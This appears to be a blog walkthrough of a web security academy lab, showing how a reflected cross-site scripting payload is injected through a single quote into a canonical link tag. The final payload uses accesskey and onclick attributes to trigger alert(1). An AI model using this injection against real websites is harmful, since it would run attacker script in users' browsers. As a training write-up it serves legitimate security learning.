Reflected XSS in canonical link tag

Lab Description:

This lab reflects user input in a canonical link tag and escapes angle brackets.

To solve the lab, perform a cross-site scripting attack on the home page that injects an attribute that calls the alert function.

To assist with your exploit, you can assume that the simulated user will press the following key combinations:

ALT+SHIFT+XCTRL+ALT+XAlt+X

What is a Canonical Link?

In web development and SEO (Search Engine Optimization), ‘canonical’ means the preferred version of a webpage when there are multiple URLs that show the same content. It helps search engines identify the best version to show in search results.

For example, if you have a webpage that can be accessed through different URLs due to parameters or tracking tags (e.g., https://example.com/page and https://example.com/page?utm_source=google), you may want to designate one URL as the canonical version to avoid diluting search engine rankings and to consolidate the page's authority.

Getting Started:

Access the lab. This time our blog page does not incorporate a search feature. If we view the page source, by right-clicking anywhere on the page and selecting ‘View Page Source’ from the drop-down menu, we can see our blog page’s canonical link.

<!DOCTYPE html>
<html>
<head>
<link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
<link href=/resources/css/labsBlog.css rel=stylesheet>
<link rel="canonical" href='https://0a2d008f042c69ad809908ab00e70059.web-security-academy.net/'/>
<title>Reflected XSS in canonical link tag</title>
</head>

There it is, right at the top, in the page’s <head>. Not visible to the user and contained in a href link. If we can alter that URL? Let’s try.

Since our blog page does not have a search bar, this does not mean that we can’t try to add a query at the end of your blog’s URL.

To do that, add a question mark and an alpha-numeric string that you know will not be anywhere else on the page.

// My URL looks like the following:
https://0ae400f90476697e82f81ce4008200a0.web-security-academy.net/?M4rdukWasH3re

After hitting enter or return the page should reload, unchanged. Visibly. However, right-clicking on the blog page and selecting ‘Inspect’ from the drop-down menu, will bring up your DOM-browser, and we can see how the href was affected.

Searching for your string, in the DOM search bar, will bring you right to it.

It looks as if the href mirrors the site’s URL. Notice though, in the DOM-browser, the href is in double quotes. If we try adding double quotes to the end of our string, that will not break us out though.

Look at our DOM-browser results:

<!-- Adding " ends up encoded-->
<link rel="canonical" href="https://0ae400f90476697e82f81ce4008200a0.web-security-academy.net/?M4rdukWasH3re%22">
<!-- Adding ' to the end of the URL goes through! -->
<link rel="canonical" href="https://0ae400f90476697e82f81ce4008200a0.web-security-academy.net/?M4rdukWasH3re" '="">

The single quote worked. See how it affected href link? So why did the single quote work when the href in the DOM-browser is in double quotes?

Look at our page source again by right-clicking on the page and selecting ‘View Page Source’ from the drop-down menu.

<!DOCTYPE html>
<html>
<head>
<link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
<link href=/resources/css/labsBlog.css rel=stylesheet>
<link rel="canonical" href='https://0a0400d6047fe7a38081a8aa006b00a5.web-security-academy.net/?M4rdukWasH3re''/>
<title>Reflected XSS in canonical link tag</title>
</head>

Our blog page’s source code has the href attribute in single quotes, that is why it worked. The end of the canonical href link is broken.

Next, we need to see if we can inject our own attribute that will help solve this lab.

To see if we can add an attribute, we are going to try ‘onclick’. If our link was a visible link on the page, when a user clicked on it we can get an alert to trigger by adding ‘onclick=’alert(1)’ to our URL.

<!-- Your URL should look like the following -->
https://0a0400d6047fe7a38081a8aa006b00a5.web-security-academy.net/?M4rdukWasH3re%27onclick=%27alert(1)

We leave the trailing single quote off the URL because the server provides the final single in it’s response.

Notice the page source.

<!-- Page source response -->
<!DOCTYPE html>
<html>
<head>
<link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
<link href=/resources/css/labsBlog.css rel=stylesheet>
<link rel="canonical" href='https://0a0400d6047fe7a38081a8aa006b00a5.web-security-academy.net/?M4rdukWasH3re'onclick='alert(1)'/>
<title>Reflected XSS in canonical link tag</title>
</head>

It worked. We injected our own attribute.

From here we need to find a way to get the user to ‘click’ on a link they can not see.

This lab wants us to make it so when a user uses some variation of ‘x’ key: Alt+Shift+x, Ctrl+Alt+x, Alt+x. Here is where the ‘accesskey’ attribute come in handy.

Access Key Attribute:

In HTML, the ‘accesskey’ attribute is used to define a keyboard shortcut (or access key) for accessing or activating an element on a webpage.

When a user presses the specified key or key combination along with the appropriate modifier keys (such as Alt or Ctrl), it triggers the associated action or focuses on the element.

<!-- For example -->
<a href="#" accesskey="h">Home</a>

In this example, pressing Alt+Shift+h (or Ctrl+Alt+h, depending on the browser and operating system) would activate the “Home” link.

Different browsers and operating systems may have their own conventions for accessing access keys. For example:

Windows — the convention is usually Alt+AccessKey.MacOS — the convention is often Ctrl+Option+AccessKey.Linux — the convention can vary depending on the desktop environment.

Lab Solution:

Now that we know how the ‘accesskey’ attribute works, we need to assign ‘x’ to an ‘accesskey’ attribute within our URL.

// Add to the end of your URL and click Enter.
'accesskey='x'onclick='alert(1)
// URL should look like the following...
https://0a2e00860382315b81a6b7a800d200a9.web-security-academy.net/?M4rdukWasH3re'accesskey='x'onclick='alert(1)

We are assigning ‘x’ to be the ‘accesskey’, and when the user clicks their browser’s access key combination, it will trigger our ‘alert(1)’.

Congratulations! You solved another one!

Now try to trigger your pop-up. I was using Firefox and I was able to trigger it using ‘Alt+Shift+x’.

See you next time!